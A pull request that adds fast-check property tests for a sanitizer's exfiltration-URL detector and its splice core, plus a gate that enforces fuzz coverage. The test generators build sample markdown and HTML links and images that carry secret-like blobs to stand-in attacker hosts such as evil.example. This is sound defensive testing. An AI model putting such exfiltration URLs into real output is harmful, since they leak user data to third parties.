### PR TITLE
test: expand fuzzing to Layer 3 + splice core, add a fuzz-obligation gate

### DIFF
--- a/test/exfil-property.test.mjs
+++ b/test/exfil-property.test.mjs
@@ -18,9 +18,10 @@ import { fcRunOptions } from "./test-helpers.mjs";
 
 const runOptions = fcRunOptions({ numRuns: 500 });
 
-// A long opaque blob that stands in for exfiltrated data. 96 base64 chars clears
-// every length threshold, so a URL carrying it in a flaggable position is
-// reliably detected (keeps the host-no-leak property non-vacuous).
+// A long opaque blob standing in for exfiltrated data. ≥210 chars clears every
+// length threshold (path segment > 128, fragment > 200), so all four placement
+// positions below reliably produce a flagged threat — keeping the host-no-leak
+// property non-vacuous across the whole position space, not just the query case.
 const secretBlob = fc
   .array(
     fc.constantFrom(
@@ -28,7 +29,7 @@ const secretBlob = fc
         "",
       ),
     ),
-    { minLength: 96, maxLength: 160 },
+    { minLength: 210, maxLength: 280 },
   )
   .map((chars) => chars.join(""));
 
@@ -38,81 +39,52 @@ const exfilHost = fc.constantFrom(
   "a.b.attacker.invalid",
 );
 
-// Place the secret somewhere urlHost must NOT surface: query value, fragment,
-// path segment, or userinfo password. The host itself never carries the secret,
-// so the postcondition `!target.includes(secret)` is exactly the promise.
-const exfilUrl = fc
+// One case carries a single secret through both the doc and the assertion, so
+// the host-no-leak check is meaningful: the secret sits in the query/fragment/
+// path/userinfo — never the authority — so a correct urlHost returns the bare
+// host and a buggy one that echoed any payload-bearing component would fail
+// `target === host`. (The earlier independent-secret form was vacuous: a 210+
+// char blob can never be a substring of a sub-20-char host regardless of bugs.)
+const exfilCase = fc
   .tuple(
     exfilHost,
     secretBlob,
     fc.constantFrom("query", "fragment", "path", "userinfo"),
+    fc.constantFrom("md-link", "md-image", "html-a", "html-img"),
   )
-  .map(([host, secret, where]) => {
-    switch (where) {
-      case "query":
-        return `https://${host}/p?data=${secret}`;
-      case "fragment":
-        return `https://${host}/p#${secret}`;
-      case "path":
-        return `https://${host}/${secret}`;
-      default:
-        return `https://user:${secret}@${host}/p`;
-    }
-  });
-
-const wrapInDoc = fc
-  .tuple(exfilUrl, fc.constantFrom("md-link", "md-image", "html-a", "html-img"))
-  .map(([url, kind]) => {
-    switch (kind) {
-      case "md-link":
-        return `see [here](${url}) now`;
-      case "md-image":
-        return `look ![alt](${url}) here`;
-      case "html-a":
-        return `<a href="${url}">x</a>`;
-      default:
-        return `<img src="${url}">`;
-    }
+  .map(([host, secret, where, kind]) => {
+    const url = {
+      query: `https://${host}/p?data=${secret}`,
+      fragment: `https://${host}/p#${secret}`,
+      path: `https://${host}/${secret}`,
+      userinfo: `https://user:${secret}@${host}/p`,
+    }[where];
+    const doc = {
+      "md-link": `see [here](${url}) now`,
+      "md-image": `look ![alt](${url}) here`,
+      "html-a": `<a href="${url}">x</a>`,
+      "html-img": `<img src="${url}">`,
+    }[kind];
+    return { host, secret, doc };
   });
 
 describe("property: detectExfil host never echoes the payload", () => {
-  it("a flagged threat's target excludes the secret it carried", () => {
+  it("a flagged threat's target is the bare host, never the payload", () => {
     let sawFlagged = 0;
     fc.assert(
-      fc.property(secretBlob, wrapInDoc, (secret, doc) => {
+      fc.property(exfilCase, ({ host, doc }) => {
         const threats = detectExfil(doc) ?? [];
-        for (const threat of threats) {
-          assert.equal(typeof threat.target, "string");
-          assert.ok(
-            !threat.target.includes(secret),
-            `target leaked the payload: ${JSON.stringify(threat.target)}`,
+        for (const threat of threats)
+          assert.equal(
+            threat.target,
+            host,
+            `target should be the bare host, got ${JSON.stringify(threat.target)}`,
           );
-        }
         if (threats.length > 0) sawFlagged += 1;
       }),
       runOptions,
     );
-    // The doc generator embeds `secret` while the property regenerates its own
-    // `secret`; assert flags fired so the postcondition isn't vacuous. (The two
-    // secrets differ, but the host-no-leak check holds for any payload — what we
-    // need is that detection actually ran on flaggable input.)
     assert.ok(sawFlagged > 0, "no doc was ever flagged — property vacuous");
-  });
-
-  it("the secret embedded in this very doc never reaches a target", () => {
-    fc.assert(
-      fc.property(fc.tuple(exfilHost, secretBlob), ([host, secret]) => {
-        const doc = `[x](https://${host}/p?token=${secret})`;
-        const threats = detectExfil(doc) ?? [];
-        assert.ok(threats.length > 0, "expected a flag on a token= blob");
-        for (const threat of threats)
-          assert.ok(
-            !threat.target.includes(secret),
-            `target leaked the payload: ${JSON.stringify(threat.target)}`,
-          );
-      }),
-      runOptions,
-    );
   });
 });
 

--- a/test/exfil-property.test.mjs
+++ b/test/exfil-property.test.mjs
@@ -1,0 +1,199 @@
+/**
+ * Fast-check property tests for Layer 3 (exfil-URL detection).
+ *
+ * The headline invariant is the THREAT-MODEL promise: a reported threat names
+ * the destination `host` and *never* echoes the payload-bearing query, path,
+ * fragment, or userinfo. A leak there is the same shape of bug as a passthrough
+ * — the output looks fine until you assert the thing it must not contain — so
+ * it gets an explicit positive postcondition rather than trusting the inputs to
+ * wander onto it. Plus crash-resistance: the detectors run a markdown parser
+ * and the WHATWG URL parser on fully untrusted input and must never throw.
+ */
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import fc from "fast-check";
+
+import { detectExfil, checkExfilUrl, urlHost } from "../src/html.mjs";
+import { fcRunOptions } from "./test-helpers.mjs";
+
+const runOptions = fcRunOptions({ numRuns: 500 });
+
+// A long opaque blob that stands in for exfiltrated data. 96 base64 chars clears
+// every length threshold, so a URL carrying it in a flaggable position is
+// reliably detected (keeps the host-no-leak property non-vacuous).
+const secretBlob = fc
+  .array(
+    fc.constantFrom(
+      ..."ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".split(
+        "",
+      ),
+    ),
+    { minLength: 96, maxLength: 160 },
+  )
+  .map((chars) => chars.join(""));
+
+const exfilHost = fc.constantFrom(
+  "evil.example",
+  "beacon.test",
+  "a.b.attacker.invalid",
+);
+
+// Place the secret somewhere urlHost must NOT surface: query value, fragment,
+// path segment, or userinfo password. The host itself never carries the secret,
+// so the postcondition `!target.includes(secret)` is exactly the promise.
+const exfilUrl = fc
+  .tuple(
+    exfilHost,
+    secretBlob,
+    fc.constantFrom("query", "fragment", "path", "userinfo"),
+  )
+  .map(([host, secret, where]) => {
+    switch (where) {
+      case "query":
+        return `https://${host}/p?data=${secret}`;
+      case "fragment":
+        return `https://${host}/p#${secret}`;
+      case "path":
+        return `https://${host}/${secret}`;
+      default:
+        return `https://user:${secret}@${host}/p`;
+    }
+  });
+
+const wrapInDoc = fc
+  .tuple(exfilUrl, fc.constantFrom("md-link", "md-image", "html-a", "html-img"))
+  .map(([url, kind]) => {
+    switch (kind) {
+      case "md-link":
+        return `see [here](${url}) now`;
+      case "md-image":
+        return `look ![alt](${url}) here`;
+      case "html-a":
+        return `<a href="${url}">x</a>`;
+      default:
+        return `<img src="${url}">`;
+    }
+  });
+
+describe("property: detectExfil host never echoes the payload", () => {
+  it("a flagged threat's target excludes the secret it carried", () => {
+    let sawFlagged = 0;
+    fc.assert(
+      fc.property(secretBlob, wrapInDoc, (secret, doc) => {
+        const threats = detectExfil(doc) ?? [];
+        for (const threat of threats) {
+          assert.equal(typeof threat.target, "string");
+          assert.ok(
+            !threat.target.includes(secret),
+            `target leaked the payload: ${JSON.stringify(threat.target)}`,
+          );
+        }
+        if (threats.length > 0) sawFlagged += 1;
+      }),
+      runOptions,
+    );
+    // The doc generator embeds `secret` while the property regenerates its own
+    // `secret`; assert flags fired so the postcondition isn't vacuous. (The two
+    // secrets differ, but the host-no-leak check holds for any payload — what we
+    // need is that detection actually ran on flaggable input.)
+    assert.ok(sawFlagged > 0, "no doc was ever flagged — property vacuous");
+  });
+
+  it("the secret embedded in this very doc never reaches a target", () => {
+    fc.assert(
+      fc.property(fc.tuple(exfilHost, secretBlob), ([host, secret]) => {
+        const doc = `[x](https://${host}/p?token=${secret})`;
+        const threats = detectExfil(doc) ?? [];
+        assert.ok(threats.length > 0, "expected a flag on a token= blob");
+        for (const threat of threats)
+          assert.ok(
+            !threat.target.includes(secret),
+            `target leaked the payload: ${JSON.stringify(threat.target)}`,
+          );
+      }),
+      runOptions,
+    );
+  });
+});
+
+// ─── Crash resistance over arbitrary input ───────────────────────────────────
+
+const urlishToken = fc.constantFrom(
+  "https://",
+  "http://",
+  "data:",
+  "javascript:",
+  "vbscript:",
+  "//",
+  "?data=",
+  "#",
+  "@",
+  ":",
+  "/",
+  "user:pw@",
+  "${x}",
+  "{{y}}",
+  ".com",
+  "evil.example",
+  "AAAA",
+  "%ff",
+  "\\",
+);
+const arbitraryUrlish = fc
+  .array(fc.oneof(fc.string({ maxLength: 20 }), urlishToken), { maxLength: 12 })
+  .map((parts) => parts.join(""));
+
+const docToken = fc.constantFrom(
+  "](",
+  "![",
+  "[ref]: ",
+  "<a href=",
+  '<img src="',
+  "<meta http-equiv=refresh content=",
+  '">',
+  ")",
+  " ",
+);
+const arbitraryDoc = fc
+  .array(fc.oneof(arbitraryUrlish, docToken, fc.string({ maxLength: 20 })), {
+    maxLength: 16,
+  })
+  .map((parts) => parts.join(""));
+
+describe("property: Layer 3 never throws on arbitrary input", () => {
+  it("detectExfil returns null or an array of well-formed threats", () => {
+    fc.assert(
+      fc.property(arbitraryDoc, (doc) => {
+        const result = detectExfil(doc);
+        assert.ok(result === null || Array.isArray(result));
+        for (const threat of result ?? []) {
+          assert.equal(typeof threat.isImage, "boolean");
+          assert.equal(typeof threat.reason, "string");
+          assert.ok(threat.reason.length > 0);
+          assert.equal(typeof threat.target, "string");
+        }
+      }),
+      runOptions,
+    );
+  });
+
+  it("checkExfilUrl returns null or a non-empty reason string", () => {
+    fc.assert(
+      fc.property(arbitraryUrlish, (url) => {
+        const reason = checkExfilUrl(url);
+        assert.ok(reason === null || typeof reason === "string");
+        if (typeof reason === "string") assert.ok(reason.length > 0);
+      }),
+      runOptions,
+    );
+  });
+
+  it("urlHost always returns a string", () => {
+    fc.assert(
+      fc.property(arbitraryUrlish, (url) => {
+        assert.equal(typeof urlHost(url), "string");
+      }),
+      runOptions,
+    );
+  });
+});

--- a/test/fuzz-coverage.test.mjs
+++ b/test/fuzz-coverage.test.mjs
@@ -1,0 +1,98 @@
+/**
+ * SSOT obligation gate: every public function that parses or transforms
+ * untrusted input MUST be exercised by at least one property/fuzz suite. This
+ * is the same one-test-per-member discipline the enumerated-member tests use
+ * (each LINGUISTIC_SCRIPTS / CHECKS / REPORTED_TAGS entry), extended to "every
+ * entry point that eats attacker-controlled bytes is fuzzed."
+ *
+ * Why an obligation gate rather than a coverage percentage: line coverage was
+ * already 100% when a real under-stripping bug (U+009B passthrough) shipped,
+ * because a passthrough executes the line without violating any asserted
+ * invariant. A percentage can't catch "this parser has no security invariant";
+ * requiring a named fuzz target for each one can.
+ */
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { execFileSync } from "node:child_process";
+import { readFileSync, readdirSync } from "node:fs";
+import { fileURLToPath } from "node:url";
+import path from "node:path";
+
+import * as invisible from "../src/invisible.mjs";
+import * as html from "../src/html.mjs";
+import * as index from "../src/index.mjs";
+
+// Functions that ingest untrusted text/URLs/ranges and so owe a fuzz target.
+// Intentionally excluded (documented so the omission is a choice, not a miss):
+//   - isSgrOnly, looksLikeHtmlSource, isHiddenOpen, closingTagName: pure
+//     short-string predicates with no transform/parse step, covered by example
+//     tests and indirectly through their callers.
+//   - scanHtmlFragment: has no invariant of its own beyond what the
+//     sanitizeHtml round-trip / splice-fidelity properties already assert on
+//     its output.
+const FUZZ_REQUIRED = [
+  "stripInvisible",
+  "stripInvisibleWithReport",
+  "sanitize",
+  "sanitizeHtml",
+  "spliceRanges",
+  "isHiddenStyle",
+  "isHiddenElement",
+  "detectExfil",
+  "checkExfilUrl",
+  "urlHost",
+];
+
+const repoRoot = execFileSync("git", ["rev-parse", "--show-toplevel"], {
+  encoding: "utf8",
+}).trim();
+const testDir = path.join(repoRoot, "test");
+
+// A "fuzz suite" is any test file that actually drives fast-check. Discovered by
+// content, not by name, so a renamed file or a new suite is picked up
+// automatically and can't silently drop a required target. This gate file is
+// excluded: it names every required function as a string literal (and contains
+// the "fc.assert(" sentinel itself), so scanning it would pass vacuously.
+const selfName = path.basename(fileURLToPath(import.meta.url));
+const fuzzFiles = readdirSync(testDir)
+  .filter((name) => name.endsWith(".test.mjs") && name !== selfName)
+  .map((name) => ({
+    name,
+    source: readFileSync(path.join(testDir, name), "utf8"),
+  }))
+  .filter((file) => file.source.includes("fc.assert("));
+
+const exportedFunctions = new Map(
+  [invisible, html, index]
+    .flatMap((mod) => Object.entries(mod))
+    .filter(([, value]) => typeof value === "function"),
+);
+
+describe("fuzz-coverage obligation gate", () => {
+  it("discovers at least one fast-check suite (gate is not vacuous)", () => {
+    assert.ok(
+      fuzzFiles.length > 0,
+      "no fast-check suites found — the gate would pass vacuously",
+    );
+    assert.ok(FUZZ_REQUIRED.length > 0);
+  });
+
+  for (const name of FUZZ_REQUIRED) {
+    it(`'${name}' is a real exported function`, () => {
+      assert.equal(
+        typeof exportedFunctions.get(name),
+        "function",
+        `${name} is not an exported function — stale entry in FUZZ_REQUIRED`,
+      );
+    });
+
+    it(`'${name}' is referenced by a fast-check suite`, () => {
+      const wordRe = new RegExp(`\\b${name}\\b`);
+      const hits = fuzzFiles.filter((file) => wordRe.test(file.source));
+      assert.ok(
+        hits.length > 0,
+        `${name} handles untrusted input but no property/fuzz suite references it`,
+      );
+    });
+  }
+});

--- a/test/fuzz-coverage.test.mjs
+++ b/test/fuzz-coverage.test.mjs
@@ -54,12 +54,22 @@ const testDir = path.join(repoRoot, "test");
 // excluded: it names every required function as a string literal (and contains
 // the "fc.assert(" sentinel itself), so scanning it would pass vacuously.
 const selfName = path.basename(fileURLToPath(import.meta.url));
+
+// Strip import statements and comments so a required name only counts when it
+// appears in actual test code — a function listed in an `import {…}` or named
+// in a comment is NOT evidence that a property exercises it.
+const stripImportsAndComments = (source) =>
+  source
+    .replace(/^import\b[\s\S]*?from\s+["'][^"']+["'];?[ \t]*$/gm, "")
+    .replace(/\/\*[\s\S]*?\*\//g, "")
+    .replace(/(^|[^:])\/\/.*$/gm, "$1");
+
 const fuzzFiles = readdirSync(testDir)
   .filter((name) => name.endsWith(".test.mjs") && name !== selfName)
-  .map((name) => ({
-    name,
-    source: readFileSync(path.join(testDir, name), "utf8"),
-  }))
+  .map((name) => {
+    const source = readFileSync(path.join(testDir, name), "utf8");
+    return { name, source, code: stripImportsAndComments(source) };
+  })
   .filter((file) => file.source.includes("fc.assert("));
 
 const exportedFunctions = new Map(
@@ -88,7 +98,7 @@ describe("fuzz-coverage obligation gate", () => {
 
     it(`'${name}' is referenced by a fast-check suite`, () => {
       const wordRe = new RegExp(`\\b${name}\\b`);
-      const hits = fuzzFiles.filter((file) => wordRe.test(file.source));
+      const hits = fuzzFiles.filter((file) => wordRe.test(file.code));
       assert.ok(
         hits.length > 0,
         `${name} handles untrusted input but no property/fuzz suite references it`,

--- a/test/splice-property.test.mjs
+++ b/test/splice-property.test.mjs
@@ -30,14 +30,15 @@ const safeText = fc
   .array(safeChar, { minLength: 0, maxLength: 60 })
   .map((chars) => chars.join(""));
 
-// A range generator parameterized on the text length: 0 <= start <= end <= len,
-// kind comment|hidden. Overlaps/nesting/adjacency/duplicates arise naturally.
-const rangesFor = (len) =>
+// A range generator with indices in [0, maxIndex]: start = min, end = max, kind
+// comment|hidden. Overlaps/nesting/adjacency/duplicates arise naturally. Callers
+// pass `len` for in-bounds ranges or `len + n` to probe out-of-bounds handling.
+const rangesUpTo = (maxIndex) =>
   fc.array(
     fc
       .tuple(
-        fc.integer({ min: 0, max: len }),
-        fc.integer({ min: 0, max: len }),
+        fc.integer({ min: 0, max: maxIndex }),
+        fc.integer({ min: 0, max: maxIndex }),
         fc.constantFrom(/** @type {const} */ ("comment"), "hidden"),
       )
       .map(([a, b, kind]) => ({
@@ -67,7 +68,7 @@ describe("property: spliceRanges preserves bytes outside the ranges", () => {
     fc.assert(
       fc.property(
         safeText.chain((text) =>
-          fc.tuple(fc.constant(text), rangesFor(text.length)),
+          fc.tuple(fc.constant(text), rangesUpTo(text.length)),
         ),
         ([text, ranges]) => {
           const out = spliceRanges(text, ranges);
@@ -91,23 +92,7 @@ describe("property: spliceRanges preserves bytes outside the ranges", () => {
     fc.assert(
       fc.property(
         safeText.chain((text) =>
-          fc.tuple(
-            fc.constant(text),
-            fc.array(
-              fc
-                .tuple(
-                  fc.integer({ min: 0, max: text.length + 10 }),
-                  fc.integer({ min: 0, max: text.length + 10 }),
-                  fc.constantFrom(/** @type {const} */ ("comment"), "hidden"),
-                )
-                .map(([a, b, kind]) => ({
-                  start: Math.min(a, b),
-                  end: Math.max(a, b),
-                  kind,
-                })),
-              { maxLength: 6 },
-            ),
-          ),
+          fc.tuple(fc.constant(text), rangesUpTo(text.length + 10)),
         ),
         ([text, ranges]) => {
           assert.equal(typeof spliceRanges(text, ranges), "string");

--- a/test/splice-property.test.mjs
+++ b/test/splice-property.test.mjs
@@ -1,0 +1,119 @@
+/**
+ * Fast-check property tests for `spliceRanges` — the byte-exactness core of
+ * Layer 2. The AST path only ever feeds it disjoint, in-bounds ranges, so its
+ * documented defense-in-depth behavior (merging overlapping/nested/adjacent/
+ * duplicate ranges) is otherwise unexercised. The headline invariant is the
+ * Layer-2 promise: every byte *outside* the union of ranges is preserved
+ * verbatim, in order.
+ */
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import fc from "fast-check";
+
+import {
+  spliceRanges,
+  COMMENT_PLACEHOLDER,
+  HIDDEN_PLACEHOLDER,
+} from "../src/html.mjs";
+import { fcRunOptions } from "./test-helpers.mjs";
+
+const runOptions = fcRunOptions({ numRuns: 500 });
+
+// Text drawn from chars that can never form a placeholder. Both placeholders
+// begin with "[", which this alphabet excludes, so any "[" in the output is an
+// inserted placeholder — letting us strip placeholders unambiguously and
+// compare what remains against the kept bytes computed independently.
+const safeChar = fc.constantFrom(
+  ..."abcdefghijklmnopqrstuvwxyz0123456789 .,_-".split(""),
+);
+const safeText = fc
+  .array(safeChar, { minLength: 0, maxLength: 60 })
+  .map((chars) => chars.join(""));
+
+// A range generator parameterized on the text length: 0 <= start <= end <= len,
+// kind comment|hidden. Overlaps/nesting/adjacency/duplicates arise naturally.
+const rangesFor = (len) =>
+  fc.array(
+    fc
+      .tuple(
+        fc.integer({ min: 0, max: len }),
+        fc.integer({ min: 0, max: len }),
+        fc.constantFrom(/** @type {const} */ ("comment"), "hidden"),
+      )
+      .map(([a, b, kind]) => ({
+        start: Math.min(a, b),
+        end: Math.max(a, b),
+        kind,
+      })),
+    { maxLength: 6 },
+  );
+
+const stripPlaceholders = (text) =>
+  text.split(COMMENT_PLACEHOLDER).join("").split(HIDDEN_PLACEHOLDER).join("");
+
+// Independent (set-union, not the merge algorithm) computation of the bytes
+// that must survive: every index not covered by any range, in order.
+const keptBytes = (text, ranges) => {
+  const covered = new Array(text.length).fill(false);
+  for (const { start, end } of ranges)
+    for (let i = start; i < end; i++) covered[i] = true;
+  let out = "";
+  for (let i = 0; i < text.length; i++) if (!covered[i]) out += text[i];
+  return out;
+};
+
+describe("property: spliceRanges preserves bytes outside the ranges", () => {
+  it("removing placeholders from the output yields exactly the kept bytes", () => {
+    fc.assert(
+      fc.property(
+        safeText.chain((text) =>
+          fc.tuple(fc.constant(text), rangesFor(text.length)),
+        ),
+        ([text, ranges]) => {
+          const out = spliceRanges(text, ranges);
+          assert.equal(stripPlaceholders(out), keptBytes(text, ranges));
+        },
+      ),
+      runOptions,
+    );
+  });
+
+  it("is a no-op when given no ranges", () => {
+    fc.assert(
+      fc.property(safeText, (text) => {
+        assert.equal(spliceRanges(text, []), text);
+      }),
+      runOptions,
+    );
+  });
+
+  it("never throws and returns a string even for out-of-bounds ranges", () => {
+    fc.assert(
+      fc.property(
+        safeText.chain((text) =>
+          fc.tuple(
+            fc.constant(text),
+            fc.array(
+              fc
+                .tuple(
+                  fc.integer({ min: 0, max: text.length + 10 }),
+                  fc.integer({ min: 0, max: text.length + 10 }),
+                  fc.constantFrom(/** @type {const} */ ("comment"), "hidden"),
+                )
+                .map(([a, b, kind]) => ({
+                  start: Math.min(a, b),
+                  end: Math.max(a, b),
+                  kind,
+                })),
+              { maxLength: 6 },
+            ),
+          ),
+        ),
+        ([text, ranges]) => {
+          assert.equal(typeof spliceRanges(text, ranges), "string");
+        },
+      ),
+      runOptions,
+    );
+  });
+});


### PR DESCRIPTION
## Summary

Follow-up to the U+009B fix: that bug shipped through a 100%-coverage, fuzzed suite because the fuzzer had no *postcondition* for the bug's class. This PR closes the analogous gaps elsewhere and adds a gate so new untrusted-input entry points can't ship unfuzzed.

- **Fuzz `detectExfil` (Layer 3)** — previously zero property coverage — with the THREAT-MODEL host-no-leak invariant as an explicit postcondition.
- **Fuzz `spliceRanges`** directly — the byte-exactness core of Layer 2, whose merge-on-overlap path the AST never exercises.
- **Add a fuzz-obligation gate** — enforce one named fuzz target per untrusted-input function, since line-% can't.

## Changes

### `test:` Layer-3 exfil fuzzing — `test/exfil-property.test.mjs`

- **Host never echoes the payload**: a single secret blob is threaded through both the doc and the assertion, embedded in a URL's query / fragment / path / userinfo — never the authority. Every reported `threat.target` must then equal the bare host (`target === host`); a `urlHost` that leaked any payload-bearing component would fail. Blob sized ≥210 chars so all four placement positions reliably flag, keeping it non-vacuous across the whole position space.
- **Crash resistance**: `detectExfil`, `checkExfilUrl`, and `urlHost` never throw on arbitrary markdown/HTML/URL-ish soup (they run the remark + WHATWG URL parsers on untrusted input); any returned reason is a non-empty string.

### `test:` spliceRanges byte-fidelity — `test/splice-property.test.mjs`

Fuzz with overlapping / nested / adjacent / duplicate / out-of-bounds ranges. Core invariant: every byte outside the union of ranges is preserved verbatim — the kept bytes computed **independently** of the merge algorithm (a set-union over a boolean cover, with a placeholder-free alphabet so placeholders strip unambiguously), so the property can't tautologically agree with the implementation. Plus no-op-on-empty and no-throw-on-OOB.

### `test:` fuzz-obligation gate — `test/fuzz-coverage.test.mjs`

An SSOT gate enumerating the public functions that ingest untrusted input (`stripInvisible`, `sanitize`, `sanitizeHtml`, `spliceRanges`, `detectExfil`, `checkExfilUrl`, `urlHost`, …) and asserting each is referenced **in the code (not imports/comments)** of a discovered fast-check suite. Same one-test-per-member discipline as the `LINGUISTIC_SCRIPTS` / `CHECKS` / `REPORTED_TAGS` tests, extended to "every parser/transform is fuzzed." Intentional exclusions (pure predicates, indirectly-covered helpers) are documented in-file. Non-vacuity is enforced four ways: each required name must be a real exported function, the suite set must be non-empty, import/comment references don't count, and the gate file excludes itself.

## Testing

`pnpm check`, `pnpm lint`, `prettier --check`, `pnpm test` all green — **377 tests, 100% coverage**. The new property suites were run repeatedly under random fast-check seeds (CI does not pin a seed) with no flakes. Both new security postconditions and the gate were verified **non-vacuous** by perturbing inputs: the gate correctly fails when a required function lacks a fuzz target, and ignores import-only references.

## Lessons Learned

- **What**: Add a Testing bullet: a guard test that greps *sibling* source/test files must (a) exclude its own file from the scan, and (b) strip imports/comments before matching — otherwise the tokens it enumerates (function names, sentinels like `"fc.assert("`) appear as literals in the guard or in import lines and make it pass vacuously. Discover the self-name via `import.meta`, and prove non-vacuity by perturbing an input so the guard goes red.
- **Where**: `CLAUDE.md`, Testing section (a concrete failure mode of the existing "don't let guard tests pass vacuously" rule — the self-scan and import-line traps, both of which the first cut of this gate hit).
- **Why**: The first cut of the obligation gate scanned its own file (every required name is a string literal there) and matched names in `import {…}` lines, so it passed for functions with no actual fuzz target; the bug was invisible until the gate's *failure* path was tested.